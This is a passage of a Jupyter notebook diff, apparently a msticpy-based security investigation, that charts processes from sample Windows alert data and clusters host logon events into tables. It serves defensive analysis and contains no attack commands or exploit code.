State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"APBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAPBPA/yEdkIA8E8D/IR2QgDwTwP8hHZCAHAcmPuEdkIAsB2Y+4R2QgDgfJj7hHZCAADzifuEdkIAEEHz/oR2QgCwHPX+hHZCABCA9v6EdkIAUHH2/oR2QgAwX/b+hHZCACCf9v6EdkIAkMbz/oR2QgAQkPX+hHZCAOBV8/6EdkIA8Ezz/oR2QgAgV/P+hHZCAGBx8/6EdkIAECb1/oR2QgBgPfX+hHZCABCt9f6EdkIAsGz1/oR2QgCwd/X+hHZCACAd9v6EdkIAAEz2/oR2QgDQC/b+hHZCAPD49v6EdkIAQPo6/oR2QgBwM/f+hHZCANBRFf2EdkIA0GZC/IR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[62]},\"index\":[46,57,59,61,62,64,65,74,75,78,82,83,86,87,94,106,108,110,130,133,134,139,162,163,171,176,195,198,219,256,292,301,356,0,1,2,3,47,48,49,56,60,63,67,68,69,77,80,85,95,96,104,122,125,142,149,169,190,193,211,254,270],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"1080\"},\"selection_policy\":{\"id\":\"1081\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1095\"},{\"id\":\"1096\"},{\"id\":\"1097\"},{\"id\":\"1098\"},{\"id\":\"1099\"},{\"id\":\"1100\"},{\"id\":\"1101\"},{\"id\":\"1102\"},{\"id\":\"1103\"},{\"id\":\"1104\"},{\"id\":\"1105\"},{\"id\":\"1106\"}]},\"id\":\"1048\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1015\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{\"axis\":{\"id\":\"1019\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1022\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1011\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1045\",\"type\":\"LinearScale\"},{\"attributes\":{\"start\":-1.0},\"id\":\"1009\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1041\",\"type\":\"DataRange1d\"}],\"root_ids\":[\"1072\"]},\"title\":\"Bokeh Application\",\"version\":\"2.2.2\"}};\n  var render_items = [{\"docid\":\"7b46cde3-a6f3-4294-958d-05b83600c313\",\"root_ids\":[\"1072\"],\"roots\":{\"1072\":\"3aec6eb4-fe98-4fbc-9695-f1ac303ab126\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1072"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Column(id='1072', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1072', <span id=\"1278\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='1004', ...), Figure(id='1036', ...)],</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"1277\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1278\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1277\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 7
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "<a id='host_logons'></a>[Contents](#toc)\n",
+    "# Host Logons\n"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "Since the number of logon events may be large and, in the case of system logons, very repetitive, we use clustering to try to identity logons with unique characteristics.\n",
+    "\n",
+    "In this case we use the numeric score of the account name and the logon type (i.e. interactive, service, etc.). The results of the clustered logons are shown below along with a more detailed, readable printout of the logon event information. The data here will vary depending on whether this is a Windows or Linux host."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "source": [
+    "from msticpy.analysis.eventcluster import dbcluster_events, add_process_features, char_ord_score\n",
+    "\n",
+    "host_logons = pd.read_csv('data/host_logons.csv',\n",
+    "                          parse_dates=[\"TimeGenerated\"], \n",
+    "                          infer_datetime_format=True)\n",
+    "logon_features = host_logons.copy()\n",
+    "logon_features['AccountNum'] = host_logons.apply(lambda x: char_ord_score(x.Account), axis=1)\n",
+    "logon_features['LogonHour'] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)\n",
+    "\n",
+    "# you might need to play around with the max_cluster_distance parameter.\n",
+    "# decreasing this gives more clusters.\n",
+    "(clus_logons, _, _) = dbcluster_events(data=logon_features, time_column='TimeGenerated',\n",
+    "                                       cluster_columns=['AccountNum',\n",
+    "                                                        'LogonType'],\n",
+    "                                                         max_cluster_distance=0.0001)\n",
+    "print('Number of input events:', len(host_logons))\n",
+    "print('Number of clustered events:', len(clus_logons))\n",
+    "print('\\nDistinct host logon patterns:')\n",
+    "display(clus_logons.sort_values('TimeGenerated'))\n"
+   ],
+   "outputs": [
+    {
+     "output_type": "stream",
+     "name": "stdout",
+     "text": [
+      "Number of input events: 14\n",
+      "Number of clustered events: 3\n",
+      "\n",
+      "Distinct host logon patterns:\n"
+     ]
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "   Unnamed: 0                              TenantId  \\\n",
+       "1           1  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "0           0  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "2           2  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "\n",
+       "                         Account  EventID           TimeGenerated  \\\n",
+       "1            NT AUTHORITY\\SYSTEM     4624 2019-01-15 01:42:28.340   \n",
+       "0     MSTICAlertsWin1\\MSTICAdmin     4624 2019-01-15 04:28:33.090   \n",
+       "2  MSTICAlertsWin1\\adm1nistrator     4624 2019-01-15 05:15:06.363   \n",
+       "\n",
+       "                       SourceComputerId         Computer   SubjectUserName  \\\n",
+       "1  46fe7078-61bb-4bed-9430-7ac01d91c273  MSTICAlertsWin1  MSTICAlertsWin1$   \n",
+       "0  46fe7078-61bb-4bed-9430-7ac01d91c273  MSTICAlertsWin1  MSTICAlertsWin1$   \n",
+       "2  46fe7078-61bb-4bed-9430-7ac01d91c273  MSTICAlertsWin1                 -   \n",
+       "\n",
+       "  SubjectDomainName SubjectUserSid TargetUserName TargetDomainName  \\\n",
+       "1         WORKGROUP       S-1-5-18         SYSTEM     NT AUTHORITY   \n",
+       "0         WORKGROUP       S-1-5-18     MSTICAdmin  MSTICAlertsWin1   \n",
+       "2                 -        S-1-0-0  adm1nistrator  MSTICAlertsWin1   \n",
+       "\n",
+       "                                   TargetUserSid TargetLogonId  \\\n",
+       "1                                       S-1-5-18         0x3e7   \n",
+       "0   S-1-5-21-996632719-2361334927-4038480536-500      0xfaac27   \n",
+       "2  S-1-5-21-996632719-2361334927-4038480536-1066      0xfb5ee6   \n",
+       "\n",
+       "  LogonProcessName  LogonType AuthenticationPackageName  Status  \\\n",
+       "1         Advapi            5                 Negotiate     NaN   \n",
+       "0         Advapi            4                 Negotiate     NaN   \n",
+       "2         NtLmSsp           3                      NTLM     NaN   \n",
+       "\n",
+       "                   IpAddress  WorkstationName  AccountNum  LogonHour  \\\n",
+       "1                          -                -        1484          5   \n",
+       "0                          -  MSTICAlertsWin1        2319          5   \n",
+       "2  fe80::38dc:e4a9:61bd:b458  MSTICAlertsWin1        2799          5   \n",
+       "\n",
+       "   Clustered  ClusterId  ClusterSize          FirstEventTime  \\\n",
+       "1       True          1           11 2019-01-15 01:42:28.340   \n",
+       "0       True          0            2 2019-01-15 04:28:33.090   \n",
+       "2      False         -1            1 2019-01-15 05:15:06.363   \n",
+       "\n",
+       "            LastEventTime  \n",
+       "1 2019-01-15 05:15:14.453  \n",
+       "0 2019-01-15 05:15:02.980  \n",
+       "2 2019-01-15 05:15:06.363  "
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Unnamed: 0</th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>TargetUserName</th>\n",
+       "      <th>TargetDomainName</th>\n",
+       "      <th>TargetUserSid</th>\n",
+       "      <th>TargetLogonId</th>\n",
+       "      <th>LogonProcessName</th>\n",
+       "      <th>LogonType</th>\n",
+       "      <th>AuthenticationPackageName</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>IpAddress</th>\n",
+       "      <th>WorkstationName</th>\n",
+       "      <th>AccountNum</th>\n",
+       "      <th>LogonHour</th>\n",
+       "      <th>Clustered</th>\n",
+       "      <th>ClusterId</th>\n",
+       "      <th>ClusterSize</th>\n",
+       "      <th>FirstEventTime</th>\n",
+       "      <th>LastEventTime</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2019-01-15 01:42:28.340</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>SYSTEM</td>\n",
+       "      <td>NT AUTHORITY</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>1484</td>\n",
+       "      <td>5</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1</td>\n",
+       "      <td>11</td>\n",
+       "      <td>2019-01-15 01:42:28.340</td>\n",
+       "      <td>2019-01-15 05:15:14.453</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>0</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2019-01-15 04:28:33.090</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>4</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>-</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>2319</td>\n",
+       "      <td>5</td>\n",
+       "      <td>True</td>\n",
+       "      <td>0</td>\n",
+       "      <td>2</td>\n",
+       "      <td>2019-01-15 04:28:33.090</td>\n",
+       "      <td>2019-01-15 05:15:02.980</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\adm1nistrator</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2019-01-15 05:15:06.363</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>S-1-0-0</td>\n",
+       "      <td>adm1nistrator</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-1066</td>\n",
+       "      <td>0xfb5ee6</td>\n",
+       "      <td>NtLmSsp</td>\n",
+       "      <td>3</td>\n",
+       "      <td>NTLM</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>fe80::38dc:e4a9:61bd:b458</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>2799</td>\n",
+       "      <td>5</td>\n",
+       "      <td>False</td>\n",
+       "      <td>-1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2019-01-15 05:15:06.363</td>\n",
+       "      <td>2019-01-15 05:15:06.363</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {}
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "source": [
+    "# Display logon details\n",
+    "nbdisplay.display_logon_data(clus_logons)"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "\n",
+       "        <style>\n",
+       "            .table_logon {border-collapse: collapse; width: 50%;}\n",
+       "            .cell_logon {border: 1px solid #ddd !important;\n",
+       "                text-align: left !important; padding: 15px !important;}\n",
+       "        </style>\n",
+       "        <table class='table_logon'><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>adm1nistrator<br><b>Account Domain: </b>MSTICAlertsWin1<br><b>Logon Time: </b>2019-01-15 05:15:06.363000<br><b>Logon type: </b>3(Network)<br><b>User Id/SID: </b>S-1-5-21-996632719-2361334927-4038480536-1066<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-1066 is local machine or domain account<br><br><b>Subject (source) account: </b>-/-<br><b>Logon process: </b>NtLmSsp <br><b>Authentication: </b>NTLM<br><b>Source IpAddress: </b>fe80::38dc:e4a9:61bd:b458<br><b>Source Host: </b>MSTICAlertsWin1<br><b>Logon status: </b>nan<br></td></tr><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>MSTICAdmin<br><b>Account Domain: </b>MSTICAlertsWin1<br><b>Logon Time: </b>2019-01-15 04:28:33.090000<br><b>Logon type: </b>4(Batch)<br><b>User Id/SID: </b>S-1-5-21-996632719-2361334927-4038480536-500<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account<br><br><b>Subject (source) account: </b>WORKGROUP/MSTICAlertsWin1$<br><b>Logon process: </b>Advapi  <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>-<br><b>Source Host: </b>MSTICAlertsWin1<br><b>Logon status: </b>nan<br></td></tr><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>SYSTEM<br><b>Account Domain: </b>NT AUTHORITY<br><b>Logon Time: </b>2019-01-15 01:42:28.340000<br><b>Logon type: </b>5(Service)<br><b>User Id/SID: </b>S-1-5-18<br>&nbsp;&nbsp;SID S-1-5-18 is LOCAL_SYSTEM<br><br><b>Subject (source) account: </b>WORKGROUP/MSTICAlertsWin1$<br><b>Logon process: </b>Advapi  <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>-<br><b>Source Host: </b>-<br><b>Logon status: </b>nan<br></td></tr></table>"
+      ]
+     },
+     "metadata": {}
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "### Comparing All Logons with Clustered results relative to Alert time line"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "source": [
+    "clus_logons"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "   Unnamed: 0                              TenantId  \\\n",
+       "2           2  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "0           0  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "1           1  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
+       "\n",
+       "                         Account  EventID           TimeGenerated  \\\n",
+       "2  MSTICAlertsWin1\\adm1nistrator     4624 2019-01-15 05:15:06.363   \n",
+       "0     MSTICAlertsWin1\\MSTICAdmin     4624 2019-01-15 04:28:33.090   \n",
+       "1            NT AUTHORITY\\SYSTEM     4624 2019-01-15 01:42:28.340   \n",
+       "\n",
+       "                       SourceComputerId         Computer   SubjectUserName  \\\n",
+       "2  46fe7078-61bb-4bed-9430-7ac01d91c273  MSTICAlertsWin1                 -   \n",
+       "0  46fe7078-61bb-4bed-9430-7ac01d91c273  MSTICAlertsWin1  MSTICAlertsWin1$   \n",
+       "1  46fe7078-61bb-4bed-9430-7ac01d91c273  MSTICAlertsWin1  MSTICAlertsWin1$   \n",
+       "\n",
+       "  SubjectDomainName SubjectUserSid TargetUserName TargetDomainName  \\\n",
+       "2                 -        S-1-0-0  adm1nistrator  MSTICAlertsWin1   \n",
+       "0         WORKGROUP       S-1-5-18     MSTICAdmin  MSTICAlertsWin1   \n",
+       "1         WORKGROUP       S-1-5-18         SYSTEM     NT AUTHORITY   \n",
+       "\n",
+       "                                   TargetUserSid TargetLogonId  \\\n",
+       "2  S-1-5-21-996632719-2361334927-4038480536-1066      0xfb5ee6   \n",
+       "0   S-1-5-21-996632719-2361334927-4038480536-500      0xfaac27   \n",
+       "1                                       S-1-5-18         0x3e7   \n",
+       "\n",
+       "  LogonProcessName  LogonType AuthenticationPackageName  Status  \\\n",
+       "2         NtLmSsp           3                      NTLM     NaN   \n",
+       "0         Advapi            4                 Negotiate     NaN   \n",
+       "1         Advapi            5                 Negotiate     NaN   \n",
+       "\n",
+       "                   IpAddress  WorkstationName  AccountNum  LogonHour  \\\n",
+       "2  fe80::38dc:e4a9:61bd:b458  MSTICAlertsWin1        2799          5   \n",
+       "0                          -  MSTICAlertsWin1        2319          5   \n",
+       "1                          -                -        1484          5   \n",
+       "\n",
+       "   Clustered  ClusterId  ClusterSize          FirstEventTime  \\\n",
+       "2      False         -1            1 2019-01-15 05:15:06.363   \n",
+       "0       True          0            2 2019-01-15 04:28:33.090   \n",
+       "1       True          1           11 2019-01-15 01:42:28.340   \n",
+       "\n",
+       "            LastEventTime  \n",
+       "2 2019-01-15 05:15:06.363  \n",
+       "0 2019-01-15 05:15:02.980  \n",
+       "1 2019-01-15 05:15:14.453  "
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Unnamed: 0</th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>TargetUserName</th>\n",
+       "      <th>TargetDomainName</th>\n",
+       "      <th>TargetUserSid</th>\n",
+       "      <th>TargetLogonId</th>\n",
+       "      <th>LogonProcessName</th>\n",
+       "      <th>LogonType</th>\n",
+       "      <th>AuthenticationPackageName</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>IpAddress</th>\n",
+       "      <th>WorkstationName</th>\n",
+       "      <th>AccountNum</th>\n",
+       "      <th>LogonHour</th>\n",
+       "      <th>Clustered</th>\n",
+       "      <th>ClusterId</th>\n",
+       "      <th>ClusterSize</th>\n",
+       "      <th>FirstEventTime</th>\n",
+       "      <th>LastEventTime</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\adm1nistrator</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2019-01-15 05:15:06.363</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>S-1-0-0</td>\n",
+       "      <td>adm1nistrator</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-1066</td>\n",
+       "      <td>0xfb5ee6</td>\n",
+       "      <td>NtLmSsp</td>\n",
+       "      <td>3</td>\n",
+       "      <td>NTLM</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>fe80::38dc:e4a9:61bd:b458</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>2799</td>\n",
+       "      <td>5</td>\n",
+       "      <td>False</td>\n",
+       "      <td>-1</td>\n",
+       "      <td>1</td>\n",
+       "      <td>2019-01-15 05:15:06.363</td>\n",
+       "      <td>2019-01-15 05:15:06.363</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>0</td>\n",
